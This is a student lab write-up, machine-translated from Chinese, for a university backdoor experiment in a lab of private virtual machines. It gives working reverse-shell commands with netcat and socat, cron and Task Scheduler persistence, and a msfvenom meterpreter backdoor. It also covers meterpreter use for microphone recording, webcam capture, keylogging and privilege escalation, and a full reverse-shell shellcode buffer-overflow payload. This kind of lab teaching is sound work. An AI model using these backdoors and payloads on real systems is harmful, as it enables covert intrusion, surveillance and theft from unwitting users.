2019-2020-2 20175222 "network technology against" back door Principles and Practice Exp2

Content Experiments

Use netcat obtain host operating Shell, cron start (0.5 min)
Use socat get the host operating Shell, plans to launch the task (0.5 points)
Use MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and runs a host acquires Shell (0.5 min)
Use MSF meterpreter (or other software) to generate the target host acquires audio content, the camera, and the like recording keystrokes, and try to provide the right (2 minutes)
Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell (1 min) plus the contents of this experiment together written report.

Basic questions answered

Example you can think of possible ways to enter a backdoor on your system?

A: run a program disguised as other applications, deceive users to download.
How do you know that exemplified the back door to start up (win and linux) way?

A: backdoor set trigger conditions, specific arrival time, backdoor start.

Modify the Windows registry, Linux replace the network services.
Which gives you a deep mapping function Meterpreter there?

A: Get an audio, screen shots, be put right, steal privacy.
How to find yourself the system has not been installed back door?

A: Run anti-virus software, a firewall, the inspection process, ports, registry, network traffic conditions, and so on.

preparation

1. Fixed IP

Kali Bridge Mode virtual machine to a fixed IP: 192.168.28.129
Windows 10 is the host fixed IP: 192.168.0.110

2. SSH remote login

PasswordAuthentication, PermitRootLogin is yes still unable to verify the password, login failures, Internet search method, several attempts over two hours to no avail, in order not to delay the follow-up experiments, gave up the remote operation.

3. Windows get the linux shell

In Windows use netcat listens native 5222port. \nc64.exe -l -p 5222,这里用windows powershell无法直接运行nc64.exe，需要使用.\nc64.exe
In linux rebound connect Windows, , nc 192.168.0.110 5222 -e /bin/shusing the -e option to perform shell procedures

4. linux obtain the Windows shell

In use linux end nc -l -p 5222 instruction listening 5222 port
In Windows, use. \ nc64.exe -e powershell.exe 192.168.28.129 5222 Command reverse connection linux host 5222 port
Results: The left Windows PowerShell, the right Kali Shell

The instruction transfer data using nc

Use under Windows. \ nc.exe -L -p 5222Command monitor port 5222, -l command does not work, switch to online searching -L -p
linux using nc 192.168.0.110 5222command rebound port to connect to a Windows 5222

6. nc transfer files

linux Windows to transfer files
- Windows through. \ nc64.exe -l -p 5222> file1.out Monitor port 5222
- linux rebound connection port for Windows 5222 nc 192.168.0.110 5222 < file1.in , Windows linux can receive incoming files.
Similarly linux Windows to transfer files.

experiment

One

Use netcat get the host operating Shell, cron start

windows use ncat.exe -l -p 5222 listening 5222 port.

Cron is timed tasks under Linux, every minute running time, preset instruction is executed according to the configuration file.

crontab Increasing a timed task instructions, -e expressed editing. Add in the last line 50 * * * * /bin/netcat 192.168.0.110 5222 -e /bin/sh the first 50 minutes of each period of reverse connection port Windows 5222 host.
Time to 23:50, this time has gained Kali's shell, use ls to view directories

two

Use socat get the host operating Shell, plans to start the task

Right-windows, found the computer management, found in the System Tools Task Scheduler, create a task
常规Fill in the task name, click 触发器and then 新建触发器set the trigger point in time.

In 操作the import path socat.exe after the download, unzip, the 添加参数fill tcp-listen:5222 exec:cmd.exe,pty,stderr(to cmd.exebind to port 5222, the same time cmd.exeis stderrredirected to stdouta) create finished, click OK.

To lock the computer and then re-enter the computer socatstarts
Kali entered in socat - tcp:192.168.0.110:5222( -on behalf of the standard input and output, the second stream to port Windows 5222 host, IP for the windows of the IP), successfully cmd shell

three

Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat get transmitted to the host and run host Shell.

Explanation

Unknown problem with my win10, can not run program

After the replacement operation for Windows 7 virtual machine

Windows 7 fixed ip

In the input command kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=5222 -f exe > 20175222_backdoor.exe(IP as the kali IP) generates backdoor 20175222_backdoor.exe .
Use nc.exe -lv in Windows -p 5222> 20175222_backdoor.exe then wait.
In kali input nc 192.168.28.131 5222 <20175222_backdoor.exe (IP for Windows here IP) generated backdoor program to the Windows host, transmission success.
In linux opening up another terminal, msfconsoleenter console
Input use exploit/multi/handleruse monitoring module, set the payload
When used and generated backdoor same payload:set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.28.129Kali here the IP (and specified when generating backdoor same IP)
Port number is the same:set LPORT 5222
After the setup is complete, exploitstart listening
kali get connected to a Windows host, and got shell on the remote control

four

Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right.

Interception Audio:record_mic
Get a camera to take pictures:webcam_snap

Virtual machines can not be called a notebook built-in camera, the operation can not be achieved
Screenshots:screenshot
Keystroke recording process: keyscan_startread keystrokes record:keyscan_dump
View the current user: getuid extracting permissions:getsystem

Additional content

MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition recall connection Shell.

The main steps with a test, needless to say.

Close address randomization:

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1   //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space   //查看地址随机化的状态
echo "0" > /proc/sys/kernel/randomize_va_space  //关闭地址随机化

gdb debugging

The value of% esp + 4 = 0xffffd584

Whereby the code Change before injection four \x data.

perl -e 'print "A" x 32;print"\x84\xd5\xff\xff\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_2

In another terminal first start msfconsole

use exploit/multi/handler 用于设置
payload set payload linux/x86/shell_reverse_tcp set LHOST 127.0.0.1设置IP为回环地址
set LPORT 4444 根据代码设置端口
exploit 设置完成开始监听

After returning the terminal to perform: (cat input_2;cat) | ./pwn1 , successful shell.

Experiments and experience summary

Ssh problem encountered is the password can not log in, pop Permission denied, please try again, this issue stands to reason that as long as the changes to / etc / ssh / sshd_config content is PermitRootLogin yes can be resolved, but I do not know why the trial and error can not be solved, including heavy equipment ssh service, modify the contents of the file more press information. Because ssh service does not affect the experiment, so I finally give up.

It failed to exploit a start instruction in msfconsole found that use exploit / multi / handler does not take effect after reloading msfconsole resolved.

Basically the experiment did not encounter much of a problem, it can be successfully completed. The study netcat, socat, MSF meterpreter was a formal beginning to understand the technology of confrontation, I was very interested, and I hope the next course to learn more useful knowledge.